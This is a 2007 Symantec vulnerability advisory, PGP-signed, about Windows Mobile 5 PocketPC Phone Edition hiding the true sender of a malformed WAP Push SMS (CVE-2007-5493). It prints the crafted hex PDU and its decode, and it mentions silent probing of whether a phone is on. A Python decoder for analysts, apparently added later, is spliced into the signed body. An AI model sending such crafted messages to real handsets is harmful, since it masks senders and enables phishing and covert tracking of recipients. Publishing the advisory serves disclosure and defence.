-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory

Advisory ID: SYMSA-2007-011
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition SMS Handler
                Issue With Regard to Malformed WAP Push Messages Hiding Source
Author: Ollie Whitehouse / ollie_whitehouse@xxxxxxxxxxxx
Release Date: 17-10-2007
Application: Microsoft Windows Mobile 5 PocketPC
Platform: Windows
Severity: Information Disclosure
Vendor status: Vendor Reviewed
CVE Number: CVE-2007-5493
Reference: http://www.securityfocus.com/bid/26019

Overview:

Microsoft Windows Mobile 6 is the latest version of Microsoft's mobile
operating system. Designed for small embedded devices, Windows Mobile is
the CE feature set designed for PDAs and mobile telephones. Microsoft
Windows Mobile comes in three distinct flavors: Pocket PC, Pocket PC Phone
Edition and SmartPhone.

A vulnerability has been discovered in the SMS handler on Windows Mobile
2005 Pocket PC Phone Edition which allows the sender of the original SMS
message to be masked from the recipient when a specifically crafted WAP
PUSH message is received.

Details:

Symantec discovered that a slightly malformed WAP PUSH message could be
used to hide the originating sender of the message on Windows Mobile 2005.
The original PDU can be seen in [1]. The following PDU will cause the
Pocket PC Phone Edition SMS handler to incorrectly decode the PDU; as a
result, both the sending telephone number and the sending time shown to
the recipient are incorrect.

[1] PDU (Line wrapped)

079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101

The decode of the PDU can be seen in [2]. This decode was achieved with
PDUSpy from http://www.nobbi.com/pduspy.htm.

When this message is received by a SmartPhone it will be silently
discarded, which can also be useful to an attacker who wishes to ascertain
whether a cellphone is on without alerting the user through SMS delivery
receipts.

[2] Decode of PDU from PDUSpy

PDU LENGTH IS 118 BYTES

ADDRESS OF DELIVERING SMSC
NUMBER IS   : +447785016005
TYPE OF NR. : International
NPI         : ISDN/Telephone (E.164/163)

MESSAGE HEADER FLAGS
MESSAGE TYPE       : SMS SUBMIT
REJECT DUPLICATES  : NO
VALIDITY PERIOD    : RELATIVE
REPLY PATH         : NO
USER DATA HEADER   : PRESENT
REQ. STATUS REPORT : NO

MSG REFERENCE NR.  : 34 (0x22)

DESTINATION ADDRESS
NUMBER IS   : +447716299660
TYPE OF NR. : International
NPI         : ISDN/Telephone (E.164/163)

PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED    : Implicit / SC-specific

DATA CODING SCHEME (0x04)
AUTO-DELETION : OFF
COMPRESSION   : OFF
MESSAGE CLASS : NONE
ALPHABET USED : 8bit data

VALIDITY OF MESSAGE : 24.0 hrs

USER DATA PART OF SM
USER DATA LENGTH : 96 octets
UDH LENGTH       : 6 octets
UDH              : 05 04 0B 84 23 F0
UDH ELEMENTS     :
05 - Appl. port addressing 16bit
     4 (0x04) Bytes Information Element
     09200 : SOURCE port is: allocated by IANA
     02948 : DESTINATION port is: allocated by IANA
--- DATA ----------------------
05 04 0B 84 23 F0

USER DATA (TEXT) :
%®?ê¯?´?jEÆ symantec?Symantec bulkSMS (Unregistered Ver) - LogixMobile.com

Vendor Response:

A vulnerability has been discovered in the SMS handler. If a malicious
message with no sender was received by a user on their device, the user
may be enticed into taking action or clicking the URI, which could lead
to a second order attack.

Mitigating Factors:

By default, Windows Mobile device policy requires SI messages to be
authenticated. Mobile operators have the ability to change the policy to
not require authentication in order to allow 3rd party ring tones and
other SI messages. Microsoft will look into a different architecture in
future versions.
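As an added example (not part of the Symantec advisory and not PDUSpy's code), the following Python decoder walks the SMS-SUBMIT PDU quoted in [1] field by field and reproduces the PDUSpy breakdown in [2]: the SMSC and destination addresses, the first-octet flags, the relative validity period, and the 16-bit application-port UDH element whose destination port 2948 marks the message as a WAP Push. The names `decode_sms_submit`, `SmsSubmit`, `relative_validity_hours` and `is_wap_push` are this example's own. It handles only what the advisory's PDU uses (relative validity format, 8-bit data) and raises on inconsistent length fields instead of carrying on, which is a useful property for gateway-side or analyst tooling that inspects push messages before they reach a handset.

```python
# Added example, not from the advisory or from PDUSpy: a minimal decoder for a
# GSM 03.40 SMS-SUBMIT PDU that reproduces the field breakdown shown in [2] and
# flags the WAP Push port-addressing header. Names are the example's own.
from dataclasses import dataclass
from typing import Optional, Tuple

# PDU quoted in [1] of the advisory, with the line wrapping removed.
ADVISORY_PDU = (
    "079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA"
    "AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62"
    "756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62"
    "696C652E636F6D000101"
)

WAP_PUSH_PORT = 2948        # IANA-registered WAP connectionless push (WSP) port
IEI_APP_PORT_16BIT = 0x05   # UDH information element: 16-bit application port addressing


@dataclass
class SmsSubmit:
    smsc: str
    udhi: bool                       # user data header indicator from the first octet
    message_reference: int
    destination: str
    protocol_id: int
    data_coding: int
    validity_hours: Optional[float]  # only decoded for the relative validity format
    user_data_length: int
    udh: bytes
    app_ports: Optional[Tuple[int, int]]  # (destination port, source port)
    payload: bytes                   # user data that follows the UDH


def _semi_octets(raw: bytes) -> str:
    """Decode reversed-BCD digits; a 0xF nibble is the odd-length filler."""
    return "".join(f"{b & 0x0F:X}{b >> 4:X}" for b in raw)


def _address(toa: int, digits: str) -> str:
    # Type-of-number 001 (bits 6-4 of the type-of-address octet) is "international"
    return ("+" if (toa & 0x70) == 0x10 else "") + digits


def relative_validity_hours(vp: int) -> float:
    """TP-VP relative format (TS 23.040, 9.2.3.12.1) expressed in hours."""
    if vp <= 143:
        return (vp + 1) * 5 / 60
    if vp <= 167:
        return 12 + (vp - 143) * 0.5
    if vp <= 196:
        return (vp - 166) * 24
    return (vp - 192) * 7 * 24


def decode_sms_submit(hexpdu: str) -> SmsSubmit:
    data = bytes.fromhex(hexpdu)
    # SMSC address: its length octet counts the type-of-address octet plus digit octets
    smsc_len = data[0]
    smsc = _address(data[1], _semi_octets(data[2:1 + smsc_len]).rstrip("F"))
    pos = 1 + smsc_len
    first = data[pos]
    pos += 1
    if first & 0x03 != 0x01:
        raise ValueError("not an SMS-SUBMIT PDU")
    vpf = (first >> 3) & 0x03          # validity period format
    udhi = bool(first & 0x40)
    mr = data[pos]
    pos += 1
    # Destination address: its length octet counts digits, not octets
    ndigits, toa = data[pos], data[pos + 1]
    pos += 2
    nbytes = (ndigits + 1) // 2
    destination = _address(toa, _semi_octets(data[pos:pos + nbytes])[:ndigits])
    pos += nbytes
    pid, dcs = data[pos], data[pos + 1]
    pos += 2
    validity = None
    if vpf == 0b10:                    # relative format: one octet
        validity = relative_validity_hours(data[pos])
        pos += 1
    elif vpf in (0b01, 0b11):          # enhanced / absolute: seven octets, not interpreted here
        pos += 7
    udl = data[pos]
    pos += 1
    user_data = data[pos:]
    if (dcs >> 2) & 0x03 == 0x01 and len(user_data) != udl:  # 8-bit data: UDL counts octets
        raise ValueError(f"UDL says {udl} octets, PDU carries {len(user_data)}")
    udh, ports, payload = b"", None, user_data
    if udhi:
        udhl = user_data[0]
        if 1 + udhl > len(user_data):
            raise ValueError("UDH length exceeds user data")
        udh, payload = user_data[1:1 + udhl], user_data[1 + udhl:]
        i = 0
        while i + 2 <= len(udh):       # walk the information elements (IEI, length, body)
            iei, iel = udh[i], udh[i + 1]
            body = udh[i + 2:i + 2 + iel]
            if iei == IEI_APP_PORT_16BIT and len(body) == 4:
                ports = (int.from_bytes(body[:2], "big"), int.from_bytes(body[2:], "big"))
            i += 2 + iel
    return SmsSubmit(smsc, udhi, mr, destination, pid, dcs, validity, udl, udh, ports, payload)


def is_wap_push(msg: SmsSubmit) -> bool:
    """True when the UDH routes the message to the WAP Push port."""
    return msg.app_ports is not None and msg.app_ports[0] == WAP_PUSH_PORT


if __name__ == "__main__":
    m = decode_sms_submit(ADVISORY_PDU)
    print(f"SMSC {m.smsc} -> {m.destination}, MR {m.message_reference}, "
          f"DCS 0x{m.data_coding:02X}, validity {m.validity_hours} h")
    print(f"UDH {m.udh.hex(' ').upper()}, ports {m.app_ports}, WAP push: {is_wap_push(m)}")
```

Run against the advisory's PDU, the decoder agrees with [2] on every field it covers (SMSC +447785016005, destination +447716299660, reference 34, 8-bit DCS 0x04, 24.0 hours validity, 96 octets of user data with a 6-octet UDH routing to port 2948 from port 9200); the 89 octets after the UDH are the WSP push and WBXML Service Indication body that PDUSpy renders as the garbled "USER DATA (TEXT)" line. The advisory does not say which part of the message is malformed, so the decoder makes no attempt to flag that; what it does give a gateway or analyst is a strict, length-checked view of the sender and routing fields independent of the handset's own parser.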
Recommendation:

Contact your mobile operator to ensure the proper policy is set on your
device.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following names to these issues. These are candidates for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

CVE-2007-5493

- -------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:
research@xxxxxxxxxxxx

For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/research/

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

- -------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:
secure@xxxxxxxxxxxx

For general information on Symantec's Product Vulnerability reporting
and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

- ---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted as long
as it is not edited in any way unless authorized by Symantec Consulting
Services. Reprinting the whole or part of this alert in any medium other
than electronically requires permission from research@xxxxxxxxxxxxx

Disclaimer
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author
nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.

Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies in
the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD
1qhcVHQ07YHEdgF0zUP81/k=
=pFeF
-----END PGP SIGNATURE-----